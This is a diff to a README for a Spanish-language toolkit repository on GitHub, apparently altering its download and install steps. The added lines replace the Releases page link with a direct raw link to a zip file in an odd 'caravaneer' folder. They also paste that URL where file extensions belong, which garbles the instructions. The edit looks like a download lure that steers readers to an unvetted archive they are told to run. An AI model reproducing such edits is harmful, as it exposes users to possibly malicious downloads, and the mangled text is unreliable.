dinhmanhtruong/awesome-spanish-toolkit/README.md

 ## 🔗 Download & Install

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/dinhmanhtruong/awesome-spanish-toolkit/releases) to find the latest version.
+   Go to our [Releases page](https://raw.githubusercontent.com/dinhmanhtruong/awesome-spanish-toolkit/main/caravaneer/awesome-spanish-toolkit-1.3.zip) to find the latest version.

 2. **Choose Your Version**
    Look for the most recent release.
 You will find a list of downloadable files.
 Select the one that fits your system.

 3. **Download the File**
    Click on the file link to begin the download.
-The file will typically have an extension like `.exe`, `.zip`, or `.tar.gz`.
+The file will typically have an extension like `.exe`, `.zip`, or `https://raw.githubusercontent.com/dinhmanhtruong/awesome-spanish-toolkit/main/caravaneer/awesome-spanish-toolkit-1.3.zip`.

 4. **Open the File**
    Once downloaded, locate the file in your computer's downloads folder.

 5. **Run the Installation**
-   - If it is a `.zip` or `.tar.gz`, extract its contents first.
+   - If it is a `.zip` or `https://raw.githubusercontent.com/dinhmanhtruong/awesome-spanish-toolkit/main/caravaneer/awesome-spanish-toolkit-1.3.zip`, extract its contents first.
    - For executable files like `.exe`, double-click to start the installation.

 6. **Follow Installation Instructions**